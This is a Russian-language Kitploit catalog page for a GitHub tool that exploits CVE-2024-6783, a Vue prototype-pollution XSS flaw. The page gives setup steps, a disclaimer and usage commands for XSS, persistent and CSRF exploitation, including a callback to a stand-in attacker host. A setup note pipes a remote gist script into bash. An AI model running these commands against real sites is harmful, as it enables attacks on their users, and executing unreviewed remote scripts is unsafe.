Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-6783 — CVE-2024-6783 - Vue CVE | Kitploit
Инструменты/GitHubGitHub/horkimhab/cve-2024-6783
Анализ уязвимостейCTFОбучение и ОбразованиеПодобранные РесурсыУчебные Маршруты и КурсыЛаборатории и Практика
GitHubhorkimhab/cve-2024-6783

CVE-2024-6783

CVE-2024-6783 - Vue CVE

Репозиторий
31 месяц назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-6783 - Vue CVE

В Vue обнаружена уязвимость, которая позволяет атакующему выполнить XSS-атаку через загрязнение прототипа (prototype pollution). Атакующий может изменить цепочку прототипов некоторых свойств, таких как Object.prototype.staticClass или Object.prototype.staticStyle, для выполнения произвольного JavaScript-кода.

Пожертвования

Поддержите сопровождение этого проекта через PayPal или отсканировав QR-код ниже.

paypal

QR-код для пожертвований

⚡ Простое использование

Используйте этот проект только в безопасных и авторизованных средах, таких как:

  • Локальные виртуальные машины
  • Docker-контейнеры
  • Изолированные лабораторные стенды
  • Авторизованные среды тестирования на проникновение

Пример настройки:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783

# Проект использует Python, следуйте инструкциям ниже

# Создайте виртуальное окружение
python -m venv venv

# Активируйте виртуальное окружение

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Установите зависимости
pip install -r requirements.txt

Скачать инструмент

Пример использования:

root@kitploit:~
# только сканирование
python cve-2024-6783.py -u https://example.com -v

# Сканирование и XSS-эксплуатация
python cve-2024-6783.py -u https://example.com -e xss

# XSS-эксплуатация с обратным вызовом
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback

# Автоматический сервер обратного вызова
python cve-2024-6783.py -u https://example.com -e persistent -c auto

# CSRF-эксплуатация
python cve-2024-6783.py -u https://example.com -e csrf

# Полное сканирование и эксплуатация с подробным выводом
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html

Примечание:

  • При клонировании из другого проекта необходимо выполнить curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y, чтобы очистить вложенный каталог .git
  • например: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Авторство или ссылки

  • https://www.herodevs.com/vulnerability-directory/cve-2024-6783?nes-for-vue-2
  • vue-template-compiler-patched-bio: https://github.com/bio/vue-template-compiler-patched

📚 Образовательный репозиторий по исследованию безопасности

Репозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.


⚠️ Дисклеймер о безопасности и юридическая ответственность

Назначение

Этот репозиторий предназначен только для образовательных целей и авторизованных исследований в области безопасности.

Он создан, чтобы помочь пользователям изучить:

  • Уязвимости безопасности
  • Концепции песочницы и изоляции
  • Безопасное программирование и методы защиты

Только авторизованное использование

Используйте этот репозиторий только в средах, где у вас есть разрешение, например:

  • Личные лаборатории или виртуальные машины
  • Docker или изолированные среды
  • Авторизованное тестирование на проникновение
  • Обучение кибербезопасности или академические исследования

Несанкционированное или незаконное использование строго запрещено.


Отсутствие ответственности

Автор и участники не несут ответственности за любой ущерб, неправомерное использование, юридические проблемы или убытки, вызванные этим проектом.

Используя этот репозиторий, вы соглашаетесь с тем, что:

  • Вы несёте ответственность за свои действия
  • Вы будете использовать его законно и этично
  • Проект предоставляется без каких-либо гарантий

Этичное использование

Этот проект предназначен для:

  • Исследований в области оборонительной безопасности
  • Обучения кибербезопасности
  • Повышения осведомлённости об уязвимостях
  • Исследований безопасных систем и программного обеспечения

Пожалуйста, соблюдайте практики ответственного раскрытия информации и соблюдайте все применимые законы.


Контакты

Для ответственного раскрытия информации или сотрудничества свяжитесь с сопровождающим репозитория через GitHub.